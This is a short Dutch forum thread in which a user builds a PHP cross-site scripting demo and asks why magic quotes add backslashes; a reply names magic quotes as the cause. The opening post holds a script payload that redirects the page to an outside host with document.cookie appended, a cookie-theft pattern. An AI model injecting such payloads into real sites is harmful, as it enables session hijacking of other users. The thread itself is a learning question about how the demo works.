XSS - PHP applicatie ontwikkelen

Pagina: 1
Acties:
  • 104 views sinds 30-01-2008
  • Reageer

Onderwerpen


Acties:
  • 0 Henk 'm!

  • DeepFreeze.NL
  • Registratie: April 2006
  • Laatst online: 02-03 08:01
Ik probeer m.b.v. PHP een eenvoudig cross site scripting applicatie te ontwikkelen. Het wil alleen niet helemaal lukken O-)

Het volgende heb ik:
HTML:
1
2
3
4
5
6
<form>
<table width="480" border="0" cellspacing="0" cellpadding="0" align="center">
<tr><td>Bericht</td><td>:</td><td><textarea name="bericht" cols="40" rows="6"></textarea></td></tr>
<tr><td>&nbsp;</td><td>&nbsp;</td><td><input type="submit" value="Verstuur" /></td></tr>
</table>
</form>


Tot nu toe werkt alles fijn zoals het hoort...Wanneer ik een bericht achterlaat komt deze netjes in beeld. Wanneer ik dus een javascript in wil voeren, bijvoorbeeld:
JavaScript:
1
<script type="text/javascript">document.location='http://tweakers.net' + document.cookie;</script>


Dan wil het ingevoerde javascript niet werken. Ik krijg uiteindelijk wanneer ik de source bekijk het volgende:
JavaScript:
1
<script type=\"text/javascript\">document.location=\'http://tweakers.net\' + document.cookie;</script><br /></div>

Er verschijnen dus allemaal "\" waar ik dus niet om gevraagd heb, waarom komen deze tevoorschijn en hoe haal ik ze weg? Alvast bedankt!

[ Voor 9% gewijzigd door DeepFreeze.NL op 06-03-2007 17:05 ]


Acties:
  • 0 Henk 'm!

  • NMe
  • Registratie: Februari 2004
  • Laatst online: 09-09 13:58

NMe

Quia Ego Sic Dico.

Magic quotes?

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.


Acties:
  • 0 Henk 'm!

  • crisp
  • Registratie: Februari 2000
  • Laatst online: 15:28

crisp

Devver

Pixelated

Intentionally left blank


Acties:
  • 0 Henk 'm!

  • DeepFreeze.NL
  • Registratie: April 2006
  • Laatst online: 02-03 08:01

Acties:
  • 0 Henk 'm!

Verwijderd

offtopic:
Geen freeride skiers nodig? ;)